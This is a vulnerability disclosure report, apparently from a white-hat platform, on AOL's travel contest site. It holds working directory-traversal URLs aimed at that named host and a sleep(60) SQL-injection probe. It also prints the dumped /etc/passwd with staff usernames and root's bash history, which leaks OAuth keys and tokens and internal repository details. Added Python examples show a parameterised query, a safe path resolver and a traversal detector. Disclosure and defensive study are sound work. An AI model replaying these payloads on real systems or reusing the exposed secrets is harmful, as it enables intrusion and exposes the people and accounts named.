2015-02-11: Details reported to the vendor, awaiting vendor handling
2015-02-11: Vendor confirmed; details disclosed to the vendor only
2015-02-21: Details disclosed to core white hats and relevant domain experts
2015-03-03: Details disclosed to regular white hats
2015-03-13: Details disclosed to intern white hats
2015-03-28: Details disclosed to the public
Directory traversal(root) & SQL Injections on *.aol.com
Directory traversal:
http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg
http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Froot%252F.bash_history%2500.jpg
/root/.bash_history is readable, which means the user that started the web server is root.

SQL Injection:
http://contests.travel.aol.com/contests/showcontest/sleep(60)
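The path segment after /showcontest/ is handed to the database as SQL text, which is what the sleep(60) probe above checks for. The following Python is added here as an example and is not code from the original report or from the site; it contrasts that pattern with a handler that validates the segment as a plain integer and binds it as a query parameter. The in-memory sqlite3 table and its rows are constructed for the example (SQLite has no sleep() function, so the unsafe handler surfaces an engine error where MySQL would delay the response).

```python
import re
import sqlite3


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for a contests table; constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE contests (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO contests VALUES (?, ?)",
        [(1, "Travel photo contest"), (2, "Winter getaway")],
    )
    return conn


def show_contest_unsafe(conn: sqlite3.Connection, contest_id: str):
    """Vulnerable pattern: the path segment is spliced into the SQL text.

    Whatever follows /showcontest/ reaches the database parser unchanged.
    SQLite reports 'no such function' for sleep(60); MySQL would evaluate
    it and hold the response for 60 seconds, which is the signal a
    time-based probe looks for.
    """
    try:
        return conn.execute(
            f"SELECT name FROM contests WHERE id = {contest_id}"
        ).fetchall()
    except sqlite3.OperationalError as exc:
        # The attacker-controlled text was parsed as SQL; report that fact.
        return f"engine error: {exc}"


# A contest id is a short decimal number and nothing else.
ID_PATTERN = re.compile(r"[0-9]{1,10}")


def show_contest_safe(conn: sqlite3.Connection, contest_id: str):
    """Hardened version: validate the segment as a numeric id, then bind it.

    Returns None for anything that is not a plain integer, so the database
    never sees request-controlled SQL text. The bound parameter is typed,
    not concatenated, so even a numeric-looking value cannot alter the
    statement's structure.
    """
    if not ID_PATTERN.fullmatch(contest_id):
        return None
    return conn.execute(
        "SELECT name FROM contests WHERE id = ?", (int(contest_id),)
    ).fetchall()


if __name__ == "__main__":
    db = setup_db()
    for segment in ("2", "sleep(60)"):
        print(segment, "unsafe ->", show_contest_unsafe(db, segment))
        print(segment, "safe   ->", show_contest_safe(db, segment))
```

The validation step rejects the probe before any query is built; the parameter binding covers the case where validation is later loosened (for example to allow slugs), since the driver then passes the value separately from the statement text.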
Contents of /etc/passwd (read via the traversal):
root:x:0:0:root:/root:/bin/ksh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
apache:x:48:506:Apache:/var/www:/bin/false
urchin:x:49:49:Urchin:/usr/local/urchin:/bin/false
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rabbitmq:x:100:101:RabbitMQ messaging server:/var/lib/rabbitmq:/bin/bash
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
rack:x:501:501::/home/rack:/bin/bash
webadmin:x:502:506::/home/webadmin:/bin/bash
nagios:x:503:503::/home/nagios:/bin/bash
logstash:x:508:508::/usr/local/logstash:/bin/bash
dkim:x:511:514::/usr/local/dkimproxy:/bin/bash
submit:x:516:517::/home/submit:/bin/false
parents:x:534:534::/home/parents:/bin/false
systems:x:600:600::/home/systems:/bin/ksh
jrisner:x:601:601::/home/jrisner:/bin/bash
#vijeta:x:609:609::/home/vijeta:/bin/bash
priyanka:x:610:506::/home/priyanka:/bin/bash
nvishal:x:613:615::/home/nvishal:/bin/bash
praveen:x:614:504::/home/praveen:/bin/bash
cnikita:x:615:506::/home/cnikita:/bin/bash
amitabh:x:622:623::/home/amitabh:/bin/ksh
vamshi:x:624:625::/home/vamshi:/bin/bash
rnaresh:x:625:626::/home/rnaresh:/bin/bash
ahilash:x:626:627::/home/ahilash:/bin/bash
abhilash:x:627:628::/home/abhilash:/bin/bash
ssatish:x:629:504::/home/ssatish:/bin/bash
bharath:x:631:506::/home/bharath:/bin/bash
phani:x:632:632::/home/phani:/bin/bash
mandiv:x:633:506::/home/mandiv:/bin/bash
bramesh:x:634:634::/home/bramesh:/bin/bash
abhilashv:x:635:635::/home/abhilashv:/bin/bash
dpraskumar:x:636:506::/home/dpraskumar:/bin/bash
vramesh:x:637:637::/home/vramesh:/bin/bash
sanantoniofun:x:643:643::/home/sanantoniofun:/bin/false
firestone:x:644:644::/home/firestone:/bin/false
corona:x:645:645::/home/corona:/bin/false
spectacle:x:646:646::/home/spectacle:/bin/false
testproject:x:647:647::/home/testproject:/bin/false
jbl:x:649:649::/home/jbl:/bin/false
theplanetisyourplayground:x:650:650::/home/theplanetisyourplayground:/bin/false
coronasoccer:x:651:651::/home/coronasoccer:/bin/false
dhaval:x:653:504::/home/dhaval:/bin/bash
karthik:x:660:504::/home/karthik:/bin/bash
caterpillar:x:679:679::/home/caterpillar:/bin/false
harikrishna:x:638:504::/home/harikrishna:/bin/bash
Part of /root/.bash_history (read via the traversal):
curl --request 'POST' 'https://stream.twitter.com/1.1/statuses/filter.json' --data 'track=twitter' --header 'Authorization: OAuth oauth_consumer_key="d8JyKzy79wRm8ux1EsPgfw", oauth_nonce="48952074a4990c8ed31401fbf754cfd4", oauth_signature="skLLUs%2Fnq3nhpgk5NQmTviepsHU%3D", oauth_signature_method="HMAC-SHA1", oauth_timestamp="1367919228", oauth_token="93573954-4BIJa8sv1qwAyKeuWXaNhF3QF92IUr8l1kNNM77ez", oauth_version="1.0"' --verbose > vivek
svn --username mandiv co https://mytrtcom.svn.cloudforge.com/mtt/votigo_utils/trunk/facebooklistener /var/www/votigo_utils/facebooklistener
/usr/bin/php /var/www/votigo_utils/tweetstream/monitor.twitter.process.pl --help
grep "[email protected]" maillog*
ssh [email protected]
passwd mandiv
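The two traversal requests above defeat a naive check in two ways: the separators arrive double-encoded (%252F decodes once to %2F and only then to '/'), and a trailing encoded NUL (%2500) makes the enforced .jpg suffix irrelevant to the underlying open() call. The following Python is added here as an example and is not code from the original report or from AOL; it shows a path resolver that decodes to a fixed point, rejects NUL bytes and confines the result to a base directory, plus a log-triage predicate that flags such requests. BASE_DIR and the sample request paths are constructed for the example.

```python
import os
import urllib.parse

# Assumed document root for the contest pages; constructed for this example.
BASE_DIR = "/var/www/contests/pages"


def decode_to_fixed_point(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the string stops changing.

    One decode of %252F yields %2F, which a check for '../' never sees; the
    file layer may decode again and obtain '/'. Decoding until the value is
    stable means the check and the file system see the same bytes.
    """
    current = value
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def resolve_safe_path(requested: str, base_dir: str = BASE_DIR):
    """Map a request path to a file under base_dir, or return None.

    Rejects embedded NUL bytes (the %2500 trick that truncates the name at
    the C level, discarding the '.jpg' suffix) and any normalised result
    that escapes base_dir, whatever encoding the '..' segments arrived in.
    """
    decoded = decode_to_fixed_point(requested)
    if "\x00" in decoded:
        return None
    # Treat backslashes as separators so they cannot smuggle a segment,
    # and drop leading slashes so os.path.join cannot be reset to '/'.
    decoded = decoded.replace("\\", "/").lstrip("/")
    base = os.path.normpath(base_dir)
    candidate = os.path.normpath(os.path.join(base, decoded))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


def looks_like_traversal(raw_path: str) -> bool:
    """Log-triage predicate: after full decoding, does the request path
    contain a '..' segment or a NUL byte?"""
    decoded = decode_to_fixed_point(raw_path).replace("\\", "/")
    return ".." in decoded.split("/") or "\x00" in decoded


# Constructed sample request paths, modelled on the report's requests.
SAMPLE_PATHS = [
    "aoltravelcontest/banner.jpg",
    "aoltravelcontest/..%252F..%252F..%252Fetc/passwd%2500.jpg",
    "aoltravelcontest/..%2F..%2Froot%2F.bash_history",
]


def flag_suspicious(paths):
    """Return the subset of paths a traversal detector would flag."""
    return [p for p in paths if looks_like_traversal(p)]


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(p, "->", resolve_safe_path(p), "flagged:", looks_like_traversal(p))
```

The resolver and the detector share the same decoding step on purpose: a detector that decodes once while the application decodes twice is exactly the mismatch the double-encoded payload exploits. The root-owned web server noted above is a separate finding; confining the path only limits what the process can reach, while running it as an unprivileged user limits what a bypass would yield.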
add filters
Severity: High
Vulnerability Rank: 11
Confirmed at: 2015-02-11 23:44
None yet